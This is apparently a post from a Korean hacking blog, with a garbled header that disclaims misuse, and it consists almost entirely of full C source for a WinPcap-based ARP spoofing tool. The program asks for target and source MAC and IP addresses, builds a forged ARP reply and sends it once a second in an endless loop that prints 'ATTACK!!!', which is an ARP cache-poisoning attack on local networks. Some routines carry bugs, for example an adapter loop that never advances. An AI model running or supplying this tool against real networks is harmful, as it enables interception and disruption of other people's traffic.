728x90
๋ฐ์ํ
ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค.
#include "Arp.h"
int main(int argc, char **argv) {
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
pcap_t *adhandle;
char packet_filter[] = "";
struct bpf_program fcode;
u_int netmask;
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE];
int i;
uint8_t gatewayMac[ETHER_ADDR_LEN];
arpInfo info;
alldevs = printList();
inum = selectAdapter(alldevs);
adhandle = openHandle(inum, alldevs);
netmask = checkLinkLayer(adhandle, alldevs, inum);
//compile the filter
if (pcap_compile(adhandle, &fcode, packet_filter, 1, netmask) <0 ) {
fprintf(stderr,"\nUnable to compile the packet filter. Check the syntax.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
//set the filter
if (pcap_setfilter(adhandle, &fcode)<0) {
fprintf(stderr,"\nError setting the filter.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
/* Jump to the selected adapter */
for (d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
printf("\nlistening on %s...\n", d->description);
//here to start thread
/* start the capture */
//pcap_loop(adhandle, 0, packet_handler, NULL);
for (d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the output device */
if ( (fp= pcap_open(d->name, // name of the device
100, // portion of the packet to capture (only the first 100 bytes)
PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode
1000, // read timeout
NULL, // authentication on the remote machine
errbuf // error buffer
) ) == NULL) {
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]);
return -1;
}
memcpy(gatewayMac, getGatewayMac(d->name), sizeof(uint8_t) * ETHER_ADDR_LEN);
info = getArpInfo();
/* At this point, we don't need any more the device list. Free it */
pcap_freealldevs(alldevs);
parasatePacket(fp, info);
return 0;
}
pcap_if_t* printList() {
pcap_if_t *alldevs;
pcap_if_t *d;
char errbuf[PCAP_ERRBUF_SIZE];
int i = 0;
/* Retrieve the device list */
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1) {
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* Print the list */
for (d=alldevs; d; d=d->next) {
printf("%d. %s", ++numOfAdapter, d->name);
if (d->description)
printf(" (%s)\n", d->description); else
printf(" (No description available)\n");
}
if(numOfAdapter==0) {
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
exit(-1);
}
return alldevs;
}
int selectAdapter(pcap_if_t* alldevs) {
int inum;
printf("Enter the interface number (1-%d):",numOfAdapter);
scanf_s("%d", &inum);
if(inum < 1 || inum > numOfAdapter) {
printf("\nInterface number out of range.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
return inum;
}
pcap_t* openHandle(int inum, pcap_if_t* alldevs) {
pcap_if_t *d;
int i;
pcap_t *adhandle;
char errbuf[PCAP_ERRBUF_SIZE];
/* Jump to the selected adapter */
for (d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the adapter */
if ( (adhandle= pcap_open(d->name, // name of the device
65536, // portion of the packet to capture.
// 65536 grants that the whole packet will be captured on all the MACs.
PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode
1000, // read timeout
NULL, // remote authentication
errbuf // error buffer
) ) == NULL) {
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n");
/* Free the device list */
pcap_freealldevs(alldevs);
exit(-1);
}
return adhandle;
}
u_int checkLinkLayer(pcap_t *adhandle, pcap_if_t* alldevs, int inum) {
pcap_if_t *d;
u_int netmask;
int i;
/* Check the link layer. We support only Ethernet for simplicity. */
if(pcap_datalink(adhandle) != DLT_EN10MB) {
fprintf(stderr,"\nThis program works only on Ethernet networks.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
exit(-1);
}
for (d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
if(d->addresses != NULL)
/* Retrieve the mask of the first address of the interface */
netmask=((struct sockaddr_in *)(d->addresses->netmask))->sin_addr.S_un.S_addr; else
/* If the interface is without addresses we suppose to be in a C class network */
netmask=0xffffff;
return netmask;
}
void print_hex_ascii_line(const u_char *payload, int len, int offset) {
int i;
int gap;
const u_char *ch;
/* offset */
printf("%05d ", offset);
/* hex */
ch = payload;
for (i = 0; i < len; i++) {
printf("%02x ", *ch);
ch++;
/* print extra space after 8th byte for visual aid */
if (i == 7)
printf(" ");
}
/* print space to handle line less than 8 bytes */
if (len < 8)
printf(" ");
/* fill hex gap with spaces if not full line */
if (len < 16) {
gap = 16 - len;
for (i = 0; i < gap; i++) {
printf(" ");
}
}
printf(" ");
/* ascii (if printable) */
ch = payload;
for (i = 0; i < len; i++) {
if (isprint(*ch))
printf("%c", *ch); else
printf(".");
ch++;
}
printf("\n");
return;
}
void print_payload(const u_char *payload, int len) {
int len_rem = len;
int line_width = 16;
/* number of bytes per line */
int line_len;
int offset = 0;
/* zero-based offset counter */
const u_char *ch = payload;
if (len <= 0)
return;
/* data fits on one line */
if (len <= line_width) {
print_hex_ascii_line(ch, len, offset);
return;
}
/* data spans multiple lines */
while(1) {
/* compute current line length */
line_len = line_width % len_rem;
/* print line */
print_hex_ascii_line(ch, line_len, offset);
/* compute total remaining */
len_rem = len_rem - line_len;
/* shift pointer to remaining bytes to print */
ch = ch + line_len;
/* add offset */
offset = offset + line_width;
/* check if we have line width chars or less */
if (len_rem <= line_width) {
/* print last line and get out */
print_hex_ascii_line(ch, len_rem, offset);
break;
}
}
return;
}
/* Callback function invoked by libpcap for every incoming packet */
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) {
libnet_ethernet_hdr *ethernet = NULL;
libnet_ipv4_hdr *ip = NULL;
libnet_tcp_hdr *tcp = NULL;
libnet_udp_hdr *udp = NULL;
u_int i = 0;
u_int size_ip;
u_int size_tcp;
u_int size_payload;
u_int size_total;
const u_char *payload;
u_int size_udp;
/*
* Unused variable
*/
(VOID)(param);
/* retireve the position of the ip header */
ethernet = (struct libnet_ethernet_hdr *) (pkt_data);
//print dst MAC and src MAC
printf("Destination MAC: ");
for (i = 0; i < 6; i++) {
printf("%02X", ethernet->ether_dhost[i]);
if (i < 5)
printf(":");
}
printf("\nSource MAC: ");
for (i = 0; i < 6; i++) {
printf("%02X", ethernet->ether_shost[i]);
if (i < 5)
printf(":");
}
if (ntohs(ethernet->ether_type) == ETHERTYPE_IP) {
//if Ether type is IP, print src IP and dst IP
ip = (struct libnet_ipv4_hdr *) (pkt_data + sizeof(struct libnet_ethernet_hdr));
size_ip = ip->ip_hl * 4;
size_total = ntohs(ip->ip_len);
if (size_ip < IP_MIN) {
// ip header size validation
printf(" invalid IP header length: %u bytes\n", size_ip);
exit(EXIT_FAILURE);
}
printf("\nSource IP: ");
printf("%s", inet_ntoa(ip->ip_src));
printf("\nDestination IP: ");
printf("%s", inet_ntoa(ip->ip_dst));
if (ip->ip_p == IPPROTO_TCP) {
//if protocol is TCP, print src port and dst port
printf("\nTCP!!");
tcp = (struct libnet_tcp_hdr *) ((u_char*)ip + size_ip);
size_tcp = (u_int)tcp->th_off * 4;
if (size_tcp < TCP_MIN) {
// tcp header size validation
printf(" Invalid TCP header length: %u bytes\n", size_tcp);
exit(EXIT_FAILURE);
}
printf("\nSource Port: ");
printf("%d", ntohs(tcp->th_sport));
printf("\nDestination Port: ");
printf("%d", ntohs(tcp->th_dport));
payload = ((u_char*)tcp + size_tcp);
size_payload = size_total - (size_ip + size_tcp);
if (size_payload > 0) {
printf("\n");
//print_payload(payload, size_payload);
}
} else if (ip->ip_p == IPPROTO_UDP) {
//if protocol is UDP, print src port and dst port
printf("\nUDP!!");
udp = (struct libnet_udp_hdr *) ((u_char*)ip + size_ip);
size_udp = (u_int)ntohs(udp->uh_ulen);
if (size_udp < UDP_MIN) {
//udp size validation
printf(" Invalid UDP header length: %u bytes\n", size_udp);
exit(EXIT_FAILURE);
}
printf("\nSource Port: ");
printf("%d", ntohs(udp->uh_sport));
printf("\nDestination Port: ");
printf("%d", ntohs(udp->uh_dport));
payload = ((u_char*)udp + sizeof(struct libnet_udp_hdr));
size_payload = size_udp - sizeof(struct libnet_udp_hdr);
if (size_payload > 0) {
printf("\n");
print_payload(payload, size_payload);
}
}
}
printf("\n\n");
}
void parasatePacket(pcap_t *fp, arpInfo info) {
int i;
u_char *packet;
libnet_ethernet_hdr *ethernet;
libnet_arp_hdr *arp;
packet = (u_char*)malloc(sizeof(u_char)*ARP_PACKET_LEN);
ethernet = (libnet_ethernet_hdr*)malloc(sizeof(libnet_ethernet_hdr));
for (i = 0; i < ETHER_ADDR_LEN; i++) {
ethernet->ether_dhost[i] = info.ether_dhost[i];
}
for (i = 0; i < ETHER_ADDR_LEN; i++) {
ethernet->ether_shost[i] = info.ether_shost[i];
}
ethernet->ether_type = htons(ETHERTYPE_ARP);
memcpy(packet, (u_char*)ethernet, sizeof(libnet_ethernet_hdr));
arp = (libnet_arp_hdr*)malloc(sizeof(libnet_arp_hdr));
arp->ar_hrd = htons(ARPHRD_ETHER);
arp->ar_pro = htons(ETHERTYPE_IP);
arp->ar_hln = ETHER_ADDR_LEN;
arp->ar_pln = sizeof(struct in_addr);
arp->ar_op = htons(ARPOP_REPLY);
for (i = 0; i < ETHER_ADDR_LEN; i++) {
arp->ether_shost[i] = info.ether_shost[i];
}
memcpy(&(arp->ip_src), &(info.ip_src), sizeof(struct in_addr));
//arp->ip_src = addr;
for (i = 0; i < ETHER_ADDR_LEN; i++) {
arp->ether_dhost[i] = info.ether_dhost[i];
}
memcpy(&(arp->ip_dst), &(info.ip_dst), sizeof(struct in_addr));
memcpy(packet + sizeof(libnet_ethernet_hdr), (u_char*)arp, sizeof(libnet_arp_hdr));
while(1) {
printf("ATTACK!!!\n");
/* Send down the packet */
if (pcap_sendpacket(fp, packet, sizeof(u_char)*ARP_PACKET_LEN
/* size */
) != 0) {
fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp));
free(ethernet);
free(arp);
exit(-1);
}
Sleep(1000);
}
free(ethernet);
free(arp);
}
u_char* getGatewayMac(char* adapter) {
PIP_ADAPTER_INFO pAdapterInfo;
PIP_ADAPTER_INFO pAdapter = NULL;
DWORD dwRetVal = 0;
UINT i;
ULONG ulOutBufLen = sizeof (IP_ADAPTER_INFO);
in_addr addrTemp;
in_addr addr;
pAdapterInfo = (IP_ADAPTER_INFO *) MALLOC(sizeof (IP_ADAPTER_INFO));
if (pAdapterInfo == NULL) {
printf("Error allocating memory needed to call GetAdaptersinfo\n");
exit(1);
}
if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW) {
FREE(pAdapterInfo);
pAdapterInfo = (IP_ADAPTER_INFO *) MALLOC(ulOutBufLen);
if (pAdapterInfo == NULL) {
printf("Error allocating memory needed to call GetAdaptersinfo\n");
exit(1);
}
}
if ((dwRetVal = GetAdaptersInfo(pAdapterInfo, &ulOutBufLen)) == NO_ERROR) {
pAdapter = pAdapterInfo;
while (pAdapter) {
if (strcmp(pAdapter->AdapterName, adapter+20) == 0) {
addrTemp.S_un.S_addr = inet_addr(pAdapter->GatewayList.IpAddress.String);
memcpy(&addr, &addrTemp, sizeof(ULONG));
break;
}
}
} else {
printf("GetAdaptersInfo failed with error: %d\n", dwRetVal);
}
if (pAdapterInfo)
FREE(pAdapterInfo);
PMIB_IPNETTABLE pIpNetTable = NULL;
DWORD dwSize = 0;
DWORD dwResult;
dwResult = GetIpNetTable(NULL, &dwSize, 0);
/* Get the size required by GetIpNetTable() */
if (dwResult == ERROR_INSUFFICIENT_BUFFER) {
pIpNetTable = (MIB_IPNETTABLE *) malloc (dwSize);
}
/* Now that we know the size, lets use GetIpNetTable() */
if ((dwRetVal = GetIpNetTable(pIpNetTable, &dwSize, 0))
== NO_ERROR) {
if (pIpNetTable->dwNumEntries > 0) {
for (i=0; i<pIpNetTable->dwNumEntries; i++) {
if ((ULONG)pIpNetTable->table[i].dwAddr == addr.S_un.S_addr) {
return pIpNetTable->table[i].bPhysAddr;
}
}
}
}
return NULL;
}
arpInfo getArpInfo() {
arpInfo input;
char str[INPUT_BUF_SIZ];
printf("target Mac(XX:XX:XX:XX:XX:XX): ");
scanf("%2x:%2x:%2x:%2x:%2x:%2x", &(input.ether_dhost[0]),&(input.ether_dhost[1]), &(input.ether_dhost[2]), &(input.ether_dhost[3]), &(input.ether_dhost[4]), &(input.ether_dhost[5]));
printf("source Mac(XX:XX:XX:XX:XX:XX): ");
scanf("%2x:%2x:%2x:%2x:%2x:%2x", &(input.ether_shost[0]),&(input.ether_shost[1]), &(input.ether_shost[2]), &(input.ether_shost[3]), &(input.ether_shost[4]), &(input.ether_shost[5]));
printf("target IP(XXX.XXX.XXX.XXX): ");
scanf("%s", str);
input.ip_dst.S_un.S_addr = inet_addr(str);
printf("source IP(XXX.XXX.XXX.XXX): ");
scanf("%s", str);
input.ip_src.S_un.S_addr = inet_addr(str);
return input;
}728x90
๋ฐ์ํ
'Language' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
| toolhelp (0) | 2015.09.24 |
|---|---|
| C์ธ์ด ์ ๋ฆฌ (0) | 2015.09.22 |
| Mac Capture.c (0) | 2015.09.08 |
| blind sql injection.py (0) | 2015.09.08 |
| base 64 encoding (0) | 2015.09.08 |
๋๊ธ